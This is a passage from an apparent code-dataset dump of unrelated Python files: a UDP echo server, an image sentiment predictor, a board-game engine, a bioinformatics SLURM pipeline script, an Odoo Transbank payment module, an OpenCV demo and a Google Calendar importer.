action(immediate=False):\n run(config, immediate)\n\nfrom daemonize import Daemonize\npid = \"/tmp/simple_backup.pid\"\ndaemon = Daemonize(app=\"simple_monitoring\", pid=pid, action=action, keep_fds=keep_fds)\n\nif __name__ == \"__main__\":\n from run import run\n parser = argparse.ArgumentParser(description='Simple Backup')\n parser.add_argument('-d', \"--daemon\", help=\"Daemon mode\", action=\"store_true\")\n parser.add_argument('-i', \"--immediate\", help=\"Immediately run once\", action=\"store_true\")\n args = parser.parse_args()\n logger.info(\"############### starting simple monitoring services #######################\")\n if args.daemon:\n daemon.start()\n if args.immediate:\n action(immediate=True)\n else:\n action()\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"546076340","text":"import socket\nimport array\n\nBUFSIZE = 512\nport = 50000\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind(('', port))\nprint('udp echo server ready')\nwhile 1: \n data, addr = s.recvfrom(BUFSIZE)\n doubles = array.array('d', data)\n print('server received %r from %r' % (doubles, addr))\n s.sendto(data, addr)","sub_path":"udpecho.py","file_name":"udpecho.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"589162674","text":"from typing import Optional, List\n\n\nclass GoogleSearchResult:\n def __init__(self, title: str, link: str, snippet: str) -> None:\n self.code = 200\n self.message = \"OK\"\n self.title = title\n self.link = link\n self.snippet = snippet\n self.context_link = \"\"\n\n\nclass GoogleImageResult:\n def __init__(self, link: str, snippet: str, context_link: str) -> None:\n self.code = 200\n self.message = \"OK\"\n self.link = link\n self.snippet = snippet\n self.title = \"\"\n self.context_link = context_link\n\n\nclass YoutubeSearchResult:\n def __init__(\n self, video_id: str, title: str, description: str, channel: str\n ) -> None:\n self.code = 200\n self.message = \"OK\"\n self.link = f\"https://www.youtube.com/watch?v={video_id}\"\n self.title = title\n self.description = description\n self.channel = channel\n\n\nclass NotFoundResult:\n def __init__(self) -> None:\n self.code = 404\n self.message = \"Not Found\"\n self.link = \"\"\n self.snippet = \"\"\n self.title = \"\"\n self.description = \"\"\n self.context_link = \"\"\n\n\nclass DvachThread:\n def __init__(self, link: str, image: str, thread_id: str) -> None:\n self.link = link\n self.image = image\n self.thread_id = thread_id\n\n\nclass DvachPost:\n def __init__(\n self, message: str, message_link: str, images: Optional[List[str]] = []\n ) -> None:\n self.message = message\n self.message_link = message_link\n self.images = images\n","sub_path":"lib/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584912483","text":"import os, sys\nimport argparse\nimport numpy as np\nimport torch\nimport torchvision.transforms as t\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.datasets.folder import default_loader\nfrom tqdm import tqdm\n\nfrom alexnet import KitModel as AlexNet\nfrom vgg19 import KitModel as VGG19\n\nfrom utils.video_reader import DecordVideoReader\nfrom PIL import Image\n\nclass ImageListDataset (Dataset):\n\n def __init__(self, list_filename, root=None, transform=None):\n super(ImageListDataset).__init__()\n \n with open(list_filename, 'r') as list_file:\n self.list = list(map(str.rstrip, list_file))\n \n self.root = root\n self.transform = transform\n \n def __getitem__(self, index):\n path = self.list[index]\n if self.root:\n path = os.path.join(self.root, path)\n \n x = default_loader(path)\n if self.transform:\n x = self.transform(x)\n \n return x\n \n def __len__(self):\n return len(self.list)\n \n \nclass VideoDataset (Dataset):\n\n def __init__(self, vr, transform=None):\n super(VideoDataset).__init__()\n \n self.vr = vr\n self.transform = transform\n \n def __getitem__(self, index):\n img =Image.fromarray(self.vr[index])\n \n if self.transform:\n x = self.transform(img)\n \n return x\n \n def __len__(self):\n return len(self.vr)\n\n \nclass ImageDataset (Dataset):\n\n def __init__(self, imgs, transform=None):\n super(ImageDataset).__init__()\n \n self.imgs = imgs\n self.transform = transform\n \n def __getitem__(self, index):\n img =Image.fromarray(self.imgs[index])\n \n if self.transform:\n x = self.transform(img)\n \n return x\n \n def __len__(self):\n return len(self.imgs)\n \n# pretrianed_models = ('hybrid_finetuned_fc6+','hybrid_finetuned_all','vgg19_finetuned_fc6+', 'vgg19_finetuned_all')\ndef sentiment_analysis(cropped_imgs,model, batch_size=8):\n\n transform = t.Compose([\n t.Resize((224, 224)),\n t.ToTensor(),\n t.Lambda(lambda x: x[[2,1,0], ...] * 255), # RGB -> BGR and [0,1] -> [0,255]\n t.Normalize(mean=[116.8007, 121.2751, 130.4602], std=[1,1,1]), # mean subtraction\n ])\n\n \n #vr = DecordVideoReader(\"videos/test.mp4\",is_torch=False)\n #data = VideoDataset(vr, transform=transform)\n data = ImageDataset(cropped_imgs, transform=transform)\n dataloader = DataLoader(data, batch_size=batch_size, num_workers=0, pin_memory=True)\n \n #topk = [] \n score = []\n #f= 0\n with torch.no_grad():\n for x in tqdm(dataloader):\n p = model(x.to('cuda')).cpu().numpy() # order is (NEG, NEU, POS)\n for single_pic in p:\n #topk.append([single_pic[2]-single_pic[0],f])\n #f += 1\n score.append( single_pic[2]-single_pic[0])\n #np.savetxt(sys.stdout.buffer, p, delimiter=',')\n print(score)\n #topk.sort(key= lambda element: element[0] ,reverse=True)\n #for i in range(10):\n #print(topk[i][1])\n #Img = Image.fromarray(vr[topk[i][1]])\n #Img.save(\"Photo/{}.jpg\".format(i))\n return score\n \n\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32491866","text":"from flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport config\nimport logging\nimport time\nimport requests, json\nimport os\nimport search\n\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\n@app.route('/')\ndef index():\n return render_template('embedded.html')\n\n# API endpoint used to skip a song\n# Uses short polling, rather than implementing websockets\n# or long polling for such a simple site for personal use\n@app.route('/skip', methods=['GET'])\ndef skip():\n skip = config.skip\n config.skip = 0\n return str(skip)\n\n# API endpoint that plays the next song\n@app.route('/nextsong', methods=['GET'])\ndef nextsong():\n if len(config.songs) == 0:\n config.currentSong = None\n return ''\n else:\n currentSongId, config.currentSong = config.songs.pop() \n config.numSongs -= 1\n return currentSongId\n\ndef stopLogging():\n time.sleep(1)\n log_names = ['werkzeug']\n app_logs = map(lambda logname: logging.getLogger(logname), log_names)\n\n for app_log in app_logs:\n for hdlr in app_log.handlers[:]: # remove all old handlers\n app_log.removeHandler(hdlr)\n","sub_path":"embedded.py","file_name":"embedded.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83610377","text":"import random\nimport math\nfrom player import Player\nfrom board import Board\nfrom combat_engine import CombatEngine\nfrom movement_engine import MovementEngine\nfrom economic_engine import EconomicEngine\nfrom unit import Destroyer, Scout, Decoy, Colony, ColonyShip, ShipYard\nfrom technology import Technology\nimport sys\nsys.path.append(\"tests\")\nfrom otest import cstring\n\n\nclass Game:\n # Initialize with 2 players and turn starts at 0\n def __init__(self, board_size, logging=False, rendering=False, die_mode=\"normal\", game_level=1, die_size=6, debug_mode=True):\n self.debug_mode = debug_mode\n self.die_size = die_size\n self.game_level = game_level\n self.die_mode = die_mode\n self.current_id = 0\n self.last_die = 0\n self.current_turn = 0\n self.logging = logging\n self.rendering = rendering\n self.players = []\n self.board = Board(self, board_size)\n self.board.init_planets((3, 6), (3, 0))\n self.board.create()\n self.combat = CombatEngine(self)\n self.movement = MovementEngine(self)\n self.economy = EconomicEngine(self)\n self.phase = \"Beginning\"\n self.round = 0\n self.winner = None\n self.current_player_id = 0\n\n # Add player to the game before running\n def add_player(self, player):\n self.players.append(player)\n player.id = len(self.players)-1\n\n def start(self):\n for player in self.players:\n player.start()\n self.log(f\"{player.get_name()} uses {type(player.strat).__name__}\")\n self.board.create()\n\n # Run for 100 turns or until all of a player's units are dead\n def run_until_completion(self, max_turns=100):\n if self.game_level == 2:\n self.phase = \"Economic\"\n self.economy.economic_phase(self.current_turn)\n while self.current_turn <= max_turns:\n self.current_turn += 1\n self.phase = \"Movement\"\n self.movement.movement_phase(self.current_turn)\n self.phase = \"Combat\"\n\n # Combat phase returns if someone won\n if self.combat.combat_phase(self.current_turn):\n break\n if self.game_level > 2:\n self.phase = \"Economic\"\n self.economy.economic_phase(self.current_turn)\n if self.test_for_winner():\n break\n self.winner = self.test_for_winner()\n if self.winner:\n self.log(\"We have a winner!!\")\n self.log(f\"Turns taken: {self.current_turn}\")\n return True\n else:\n self.log(\"Nobody won!\")\n return False\n\n def test_for_winner(self):\n alive_players = [(p, any(True for c in p.get_units() if type(c) == Colony and c.is_home_colony)) for p in self.players]\n\n loser = next((x[0] for x in alive_players if not x[1]), None)\n if loser is not None:\n alive_players.remove((loser, False))\n return alive_players[0][0]\n return None\n\n # Print to console if logging is enabled\n def log(self, *s):\n if self.logging:\n print(cstring(f\"&6{self.current_turn} &4{self.phase} &3{', '.join(str(x) for x in s)}\"))\n\n # Raise a prettier exception\n def throw(self, error, *details):\n if self.debug_mode:\n print(cstring(f\"\"\"\n&1ERROR THROWN:\n&7{error}\n&1DETAILS:\n&6Turn {self.current_turn} &4Phase {self.phase}\n&7{', '.join(str(x) for x in details)}\n \"\"\"\n ))\n import sys\n sys.exit(0)\n\n # # Render if rendering is enabled\n # def render(self):\n # if self.rendering:\n # self.board.render()\n\n def die_roll(self):\n if self.die_mode == \"ascend\":\n self.last_die += 1\n return ((self.last_die-1) % self.die_size) + 1\n elif self.die_mode == \"normal\":\n # return random.randint(1, self.die_size)\n #! This is a problem if we don't agree on exactly what this should be\n return math.ceil(self.die_size*random.random())\n elif self.die_mode == \"descend\":\n self.last_die -= 1\n return (self.last_die % self.die_size) + 1\n\n # Theoretically this should just be a nonrepeating value\n def next_id(self):\n self.current_id += 1\n return self.current_id\n\n def get_unit_data(self):\n return {\n \"Scout\": {\"cp_cost\": Scout.cp_cost, \"shipsize_needed\": Scout.req_size_tech, \"hullsize\": Scout.hull_size},\n \"Destroyer\": {\"cp_cost\": Destroyer.cp_cost, \"shipsize_needed\": Destroyer.req_size_tech, \"hullsize\": Destroyer.hull_size}\n }\n\n def unit_str_to_class(self, unit):\n return {\n \"Scout\": Scout,\n \"Destroyer\": Destroyer,\n \"ColonyShip\": ColonyShip,\n \"ShipYard\": ShipYard,\n \"Colony\": Colony\n }[unit]\n\n def generate_state(self, player=None, combat=False):\n return {\n 'turn': self.current_turn,\n 'winner': None,\n 'players': [p.generate_state(player==p, combat) for p in self.players],\n 'player_whose_turn': self.current_player_id,\n 'phase': self.phase,\n 'round': self.round,\n 'technology_data': Technology.get_state(),\n 'unit_data': self.get_unit_data(),\n 'board_size': self.board.size\n }\n","sub_path":"deprecated/src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276409210","text":"\"\"\"\nscons build file\n\n\tp\n\n@author: Jean-Lou Dupont\n\"\"\"\n\nImport('env')\n\nd = env.Dictionary()\n\n#no difference at this point\nif d.get('_DEBUG', False):\n\t#DEBUG\n\tlibs=['ei','epapi_debug']\n\tpr = env.Program('decho', Glob(\"src/*.cc\"), LIBS=libs )\t\nelse:\n\t#RELEASE\n\tlibs=['ei','epapi']\n\tpr = env.Program('echo', Glob(\"src/*.cc\"), LIBS=libs )\n\t\nDefault(pr)\n","sub_path":"package/test/echo/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460541143","text":"### usage\n# python 04_concat_scaffolds.py /path/to/parentdir/used/in/00_start-pipeline/command \n### \n\n### purpose\n# instead of calling snps when combining some of our pools, call snps for indiviual pools\n###\n\n### FIX\n# I've used 'kit' as a key word that is in all of the library/pool names, this should be changed if not the case\n# see creation of combdict\n###\n\n### imports\nimport sys\nimport os\nfrom os import path as op\nfrom os import listdir\nimport pickle\nimport numpy as np\ndef uni(mylist):\n return (np.unique(mylist).tolist())\ndef ls(DIR):\n return sorted([f for f in listdir(DIR)])\ndef fs (DIR):\n return sorted([op.join(DIR,f) for f in ls(DIR)])\ndef createdirs(dirs):\n for d in dirs:\n if not op.exists(d):\n os.makedirs(d)\n### \n\n### args\nthisfile, parentdir = sys.argv\nif parentdir.endswith(\"/\"):\n parentdir = parentdir[:-1]\npoolref = pickle.load(open(op.join(parentdir,'poolref.pkl'),'rb'))\n###\n\n### dirs\nshdir = op.join(parentdir,'shfiles/concat')\ncatdir = op.join(parentdir,'concatenated_vcfs')\nfiltdir = op.join(parentdir,'filtered_snps')\ncreatedirs([shdir,catdir,filtdir])\n###\n\n# get the snpfiles\nsnpdir = op.join(parentdir,'snps')\nallfiles = fs(snpdir)\nsnpfiles = [f for f in fs(snpdir) if f.endswith('.gz') and 'snp' in op.basename(f) and f.replace('.gz','.gz.tbi') in allfiles]\nos.system('echo \"len(snpfiles) = %s\"' % str(len(snpfiles)))\n\n# sort snpfiles by combo lib\ncombdict = {}\nfor i,snp in enumerate(snpfiles):\n lib = \"---\".join([x for x in op.basename(snp).split(\"-\") if 'kit' in x])\n if not lib in combdict:\n combdict[lib] = []\n combdict[lib].append(snp)\nos.system('echo there are %s keys in combdict' % str(len(combdict.keys())))\nfor k in combdict.keys():\n os.system('echo %s' % k)\n\n# write the sh files\nshfiles = []\nfor lib in combdict.keys():\n if len(combdict[lib]) in [500,1000]:\n catout = op.join(catdir,\"%s_concatenated_snps.vcf.gz\" % lib)\n filtout = op.join(filtdir,\"%s_filtered_concatenated_snps.vcf.gz\" % lib)\n firstlib = lib.split(\"---\")[0]\n ref = poolref[firstlib]\n # I should have made scaffols be zfill(4) not zfill(3)\n files = \" \".join([snp for snp in sorted(combdict[lib]) if '1000' not in snp])\n # (bcftools needs the input files to be sorted)\n files = files + ' %s ' % [snp for snp in combdict[lib] if '1000' in snp][0] \n text = '''#!/bin/bash\n#SBATCH --time=02:59:59\n#SBATCH --mem=15000M\n#SBATCH --nodes=1\n#SBATCH --ntasks=32\n#SBATCH --cpus-per-task=1\n#SBATCH --job-name=%(lib)s-concat\n#SBATCH --output=%(lib)s-concat_%%j.out \n#SBATCH --mail-user=lindb@vcu.edu\n#SBATCH --mail-type=FAIL\n\nmodule load bcftools/1.9\n\nbcftools concat %(files)s -O z -o %(catout)s --threads 32\n\nmodule load gatk/4.0.8.1\n\ngatk IndexFeatureFile -F %(catout)s\n\ngatk VariantFiltration -R %(ref)s -V %(catout)s -O %(filtout)s --filter-expression \"QD < 2.0 || FS > 60.0 || MQ < 40.0 || MQRankSum < -12.5\" --filter-name \"coadaptree_filter\"\n\n''' % locals()\n file = op.join(shdir,\"%s-concat.sh\" % lib)\n if not op.exists(filtout): # so I can run this when files begin to finish from 03a and 03b\n if not op.exists(filtout.replace(\".gz\",\".gz.tbi\")):\n with open(file,'w') as o:\n o.write(\"%s\" % text)\n shfiles.append(file)\n\n# os.chdir(shdir)\n# for sh in shfiles:\n# os.system('echo %s' % sh)\n# os.system('sbatch %s' % sh)\n[print(sh) for sh in shfiles]\n \n","sub_path":"pipeline/04_filter_concat_scaffolds.py","file_name":"04_filter_concat_scaffolds.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292775821","text":"import logging\nimport pprint\nfrom base64 import b64decode\nfrom urllib.parse import urljoin\n\nfrom tbk.services import WebpayService\nfrom tbk.commerce import Commerce\nfrom tbk import environments\nfrom odoo import api, fields, models, _\nfrom odoo.tools import float_round\nfrom odoo.tools.float_utils import float_repr\nfrom odoo.http import request\n\nfrom odoo.addons.payment.models.payment_acquirer import ValidationError\nfrom odoo.addons.payment_transbank.controllers.main import TransbankController\nfrom .transbank_data import RESPONSE_CODE, PAYMENT_TYPE_CODE\n\n_logger = logging.getLogger(__name__)\n\n\nclass PaymentAcquirerTransbank(models.Model):\n _inherit = 'payment.acquirer'\n\n provider = fields.Selection(\n selection_add=[('transbank', 'Transbank')], ondelete={'transbank': 'cascade'})\n # Elementos para generar el certificado\n transbank_commerce_id = fields.Char(\n string='ID de comercio',\n default=\"597020000541\",\n required_if_provider='transbank',\n help=\"Es requerido para que funcione el addons y generar el certificado autofirmado\")\n transbank_city = fields.Char(string=\"Ciudad\", help=\"Debe ser en mayúscula y sin tílde\")\n transbank_cert_file = fields.Binary(string=\"Cert File\")\n transbank_key_file = fields.Binary(string=\"Key File\")\n transbank_tbk_cert_file = fields.Binary(string=\"Transbank Cert File\")\n transbank_cert_file_name = fields.Char(string=\"Cert File name\")\n transbank_key_file_name = fields.Char(string=\"Key File name\")\n transbank_tbk_cert_file_name = fields.Char(string=\"Transbank Cert File name\")\n\n def _get_feature_support(self):\n res = super(PaymentAcquirerTransbank, self)._get_feature_support()\n # res['fees'].append('transbank')\n res['authorize'].append('transbank')\n # res['tokenize'].append('transbank')\n return res\n\n def transbank_get_form_action_url(self):\n return TransbankController._init_url\n\n def transbank_form_generate_values(self, values):\n amount = float_repr(float_round(values['amount'], 2), 0)\n currency = values['currency'] and values['currency'].name or ''\n buyorder = values['reference']\n acquirer_id = self.id\n\n transbank_tx_values = dict(values)\n temp_transbank_tx_values = {\n 'ACQUIRER_ID': acquirer_id,\n 'AMOUNT': amount,\n 'CURRENCY': currency,\n 'BUYORDER': buyorder\n }\n transbank_tx_values.update(temp_transbank_tx_values)\n return transbank_tx_values\n\n def _get_webpay_client(self):\n key_data = b64decode(self.transbank_key_file)\n cert_data = b64decode(self.transbank_cert_file)\n tbk_cert_data = b64decode(self.transbank_tbk_cert_file)\n transbank_enviroment = environments.DEVELOPMENT\n if self.state == 'cert':\n transbank_enviroment = environments.CERTIFICATION\n elif self.state == 'enabled':\n transbank_enviroment = environments.PRODUCTION\n commerce = Commerce(self.transbank_commerce_id, key_data, cert_data, tbk_cert_data, transbank_enviroment)\n webpay = WebpayService(commerce)\n return webpay\n\n def initTransaction(self, post):\n base_url = self.get_base_url()\n return_url = urljoin(base_url, TransbankController._result_url)\n final_url = urljoin(base_url, TransbankController._end_url)\n webpay = self._get_webpay_client()\n transaction = webpay.init_transaction(post['AMOUNT'], post['BUYORDER'], return_url, final_url)\n return transaction\n\n\nclass PaymentTransaction(models.Model):\n _inherit = 'payment.transaction'\n\n transbank_auth_transaction = fields.Char(\"Código autorización de transacción\", readonly=True, copy=False)\n transbank_payment_type = fields.Char(\"Tipo de pago\", readonly=True, copy=False)\n transbank_fee_type = fields.Char(\"Numero de cuotas\", readonly=True, copy=False)\n transbank_amount_fee = fields.Char(\"Valor de cuota\", readonly=True, copy=False)\n transbank_last_digits = fields.Char(\"Últimos dígitos de la tarjeta\", readonly=True, copy=False)\n transbank_commerce_id = fields.Char(string='ID de comercio')\n\n @api.model\n def _transbank_form_get_tx_from_data(self, data):\n reference = data.get('token_ws') or data.get('TBK_TOKEN')\n if reference:\n tx = self.search([('acquirer_reference', '=', reference)])\n elif data.get('transbank_transaction_id'):\n tx = self.browse(int(data.get('transbank_transaction_id')))\n elif data.get('BUYORDER'):\n tx = self.search([('reference', '=', data.get('BUYORDER'))])\n elif (request.session.get('sale_last_order_id') and request.session.get('__website_sale_last_tx_id')):\n tx = self.browse(request.session.get('__website_sale_last_tx_id'))\n if not tx or len(tx) > 1:\n error_msg = _('received data for reference %s') % (pprint.pformat(reference))\n if not tx:\n error_msg += _('; no order found')\n else:\n error_msg += _('; multiple order found')\n _logger.info(error_msg)\n raise ValidationError(error_msg)\n return tx\n\n def _transbank_form_get_invalid_parameters(self, data):\n invalid_parameters = []\n reference = data.get('token_ws') or data.get('TBK_TOKEN')\n if self.acquirer_reference and reference != self.acquirer_reference:\n invalid_parameters.append(('Reference code', reference, self.acquirer_reference))\n return invalid_parameters\n\n @api.model\n def _transbank_process_message_error(self, data):\n # cuando se anula en webpay se devuelve esta variable\n if data.get('TBK_TOKEN'):\n message_data = {\n 'header': 'Vemos que has desistido de tu compra.',\n 'body': 'Tal vez, estos no eran los productos que buscabas. Te invitamos a seguir mirando nuestro grandioso catálogo de productos',\n 'detail': ''\n }\n elif data.get('responseCode'):\n message_data = {\n 'header': 'Oops!. La transacción no se ha podido terminar.',\n 'body': '',\n 'detail': RESPONSE_CODE[data.get('responseCode')]\n\n }\n else:\n message_data = {\n 'header': 'Lo sentimos mucho.',\n 'body': 'Tenemos un inconveniente para realizar su compra. Solicitamos intentar nuevamente más tarde, gracias.',\n 'detail': 'Solicitamos comunicarce con nosotros y reportar el problema, gracias.'\n }\n return message_data\n\n def _transbank_form_validate(self, data):\n # cuando se anula en webpay se devuelve esta variable\n if data.get('TBK_TOKEN'):\n self._set_transaction_cancel()\n return False\n if not data.get('token_ws'):\n self._set_transaction_error(\"No se devolvio el token de la transaccion\")\n return False\n webpay_result = data.get('webpay_result') or {}\n if isinstance(webpay_result.get('detailOutput', []), list):\n detailOutput = webpay_result['detailOutput'][0]\n else:\n detailOutput = webpay_result['detailOutput']\n responseCode = detailOutput.get('responseCode', -1)\n _logger.info(pprint.pformat(webpay_result))\n transaction_vals = {\n 'state_message': str(webpay_result),\n }\n if RESPONSE_CODE.get(responseCode):\n transaction_vals['state_message'] = RESPONSE_CODE.get(responseCode)\n if responseCode == 0:\n # si tiene cuotas\n shares_amount = 0\n if 'sharesAmount' in detailOutput:\n shares_amount = detailOutput['sharesAmount']\n transaction_vals.update({\n 'transbank_auth_transaction': detailOutput['authorizationCode'],\n 'transbank_payment_type': PAYMENT_TYPE_CODE[detailOutput['paymentTypeCode']],\n 'transbank_fee_type': detailOutput['sharesNumber'],\n 'transbank_amount_fee': shares_amount,\n 'transbank_last_digits': webpay_result.get('cardDetail', {}).get('cardNumber'),\n 'transbank_commerce_id': detailOutput['commerceCode'],\n })\n self.write(transaction_vals)\n self._set_transaction_done()\n return True\n else:\n self.write(transaction_vals)\n self._set_transaction_cancel()\n return False\n\n def action_capture(self):\n transaction_transbank = self.filtered(lambda x: x.transbank_auth_transaction)\n for transaction in transaction_transbank:\n if transaction.state != 'done':\n transaction.sudo()._set_transaction_done()\n return super(PaymentTransaction, self - transaction_transbank).action_capture()\n\n def render_sale_button(self, order, submit_txt=None, render_values=None):\n if not render_values is None:\n render_values['transbank_order_id'] = order.id\n render_values['transbank_transaction_id'] = self.id\n return super(PaymentTransaction, self).render_sale_button(order, submit_txt=submit_txt,\n render_values=render_values)\n","sub_path":"payment_transbank/models/payment_acquirer.py","file_name":"payment_acquirer.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11729083","text":"\"\"\"\n@file hough_lines.py\n@brief This program demonstrates line finding with the Hough transform\n\"\"\"\n\n# Source url: https://docs.opencv.org/4.2.0/d9/db0/tutorial_hough_lines.html\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger()\n\nimport sys\nimport math\nimport cv2 as cv\nimport numpy as np\n\ndef main():\n filename = 'sudoku.png'\n src = cv.imread(filename, cv.IMREAD_GRAYSCALE)\n if src is None:\n raise Exception(\"Failed to load source file\")\n\n dst = cv.Canny(src, 50, 200, None, 3)\n cdst = cv.cvtColor(dst, cv.COLOR_GRAY2BGR)\n lines = cv.HoughLines(dst, 1, np.pi / 180, 150, None, 0, 0)\n\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = a * rho\n y0 = b * rho\n pt1 = (int(x0 + 1000*(-b)), int(y0 + 1000*(a)))\n pt2 = (int(x0 - 1000*(-b)), int(y0 - 1000*(a)))\n cv.line(cdst, pt1, pt2, (0,0,255), 3, cv.LINE_AA)\n\n cv.imshow(\"Origin image\", src)\n cv.imshow(\"Detected Lines (in red) - Standard Hough Line Transform\", cdst)\n cv.waitKey()\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n log.exception(e)","sub_path":"py_opencv/py_hough_line.py","file_name":"py_hough_line.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542912353","text":"# http://codeforces.com/problemset/problem/540/C\nfrom queue import Queue\nDIR = [(0, -1), (-1, 0), (0, 1), (1, 0)]\ndef bfs(r1, c1, r2, c2, cave):\n q = Queue()\n q.put((r1, c1))\n while q.empty() == False:\n x, y = q.get()\n for dx, dy in DIR:\n new_x = x + dx\n new_y = y + dy\n if new_x < len(cave) and new_y < len(cave[0]) \\\n and new_x >= 0 and new_y >= 0:\n if cave[new_x][new_y] == 'X':\n if new_x == r2 and new_y == c2:\n return 'YES'\n else:\n continue\n else:\n q.put((new_x, new_y))\n cave[new_x][new_y] = 'X'\n return 'NO'\n\nn, m = map(int, input().split())\ncave = [None] * n\nfor i in range(n):\n cave[i] = list(input())\n \nr1, c1 = map(int, input().split())\nr2, c2 = map(int, input().split())\nprint (bfs(r1 - 1, c1 - 1, r2 - 1, c2 - 1, cave))\n\n","sub_path":"codeforces/540C.py","file_name":"540C.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255541669","text":"#Sources:\n#https://www.geeksforgeeks.org/reading-excel-file-using-python/\n#https://developers.google.com/calendar/v3/reference\n\nfrom __future__ import print_function\nimport os.path\nfrom os import path\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfilename\nimport tkinter.messagebox\nimport datetime\nimport pickle\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport xlrd \n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/calendar.events', 'https://www.googleapis.com/auth/spreadsheets']\n\n#Root window for TK\nroot = tk.Tk()\nroot.withdraw()\n\n# Give the location of the file \nloc = askopenfilename(title = \"Select EXCEL file\",filetypes = ((\"xlsx files\",\"*.xlsx\"), (\"all files\",\"*.*\")) )\n \n#This part is about parsing the Excel file into the variables needed to store the event info\n# To open Workbook \nwb = xlrd.open_workbook(loc) \nsheet = wb.sheet_by_index(0) \n\n#Get Title/Summary\nsummary_in = (sheet.cell_value(1,0))\n\n#Get Location\nloc_in = (sheet.cell_value(1,1))\n\n#Get Desc\ndesc_in = (sheet.cell_value(1,2))\n\n#Get Start Time and Date\nstarttime_in = (sheet.cell_value(1,3))\nstartdate_in = (sheet.cell_value(1,4))\nstart_dts = startdate_in + ' ' + starttime_in\n\n#Get End Time and Date\nendtime_in = (sheet.cell_value(1,5))\nenddate_in = (sheet.cell_value(1,6))\nend_dts = enddate_in + ' ' + endtime_in\n\n#Date & timestamp stuff is janky because the JSON object \"event\" wants RCF formatted time,\n#whereas the Excel file could have any kind of time input, so using strptime with concacted strings is probably the most\n#flexible approach for now\ndto_start = datetime.datetime.strptime(start_dts, '%m-%d-%Y %I:%M %p')\ndto_end = datetime.datetime.strptime(end_dts, '%m-%d-%Y %I:%M %p')\n\n#Get Attendees // currently not implemented\n#List of attendees is a \"list of dicts\" which is the input the JSON object \"event\" wants\n#attendee = (sheet.cell_value(7,1))\nattendees = [\"lpage@example.com\", \"ddage@example.com\"]\nlist_of_attendees = [\n {'email': attendees[0] },\n {'email': attendees[1] }\n ]\n#Is a WIP\n\ndef main():\n # A quick check to see if the token already exists.\n if (not (path.exists(\"token.pickle\"))):\n tkinter.messagebox.showinfo( \"Excel to Google Event\", \"You will be prompted to login & give permission to Google Cal\")\n \n #This is taken directly from the Google API Quickstart guide\n \"\"\"Shows basic usage of the Google Calendar API.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n \n #Here the service is built with credentials & we can move on to creating the event\n service = build('calendar', 'v3', credentials=creds)\n\n #Adding on sheets service\n sheets_service = build('sheets', 'v4', credentials=creds)\n\n #Spreadsheet ID\n SPREADSHEET_ID = '15-sqH2xXxN2Oq-VPR-Ei7u9aUIqImjEMFieo32gd1BQ'\n SCHEDULE_SHEET_ID = '1461379716' # 2-Schedule Recording-Instructional Day\n INSTRUCTORS_SHEET_ID = '1867685112' # 1-Approve Courses-Instructors-DropDown Menus\n SAMPLE_RANGE_NAME = '2-Schedule Recording-Instructional Day!A57:Y192'\n\n # Call the Sheets API\n sheet = sheets_service.spreadsheets()\n result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,\n range=SAMPLE_RANGE_NAME).execute()\n values = result.get('values', [])\n print (len(values))\n\n if not values:\n print('No data found.')\n else:\n for row in values:\n print (len(row))\n # Print columns A and E, which correspond to indices 0 and 4.\n print(row[0] + ' ' + row[1] + ' ' + row[4] + ' ' + row[5] + ' ' + row[6] + ' ' + row[7] + ' ' + row[8] + ' ' + row[9] + ' ' + row[10] + ' ' + row[11] + ' ' + row[12] )\n\n #The actual JSON style event object, time 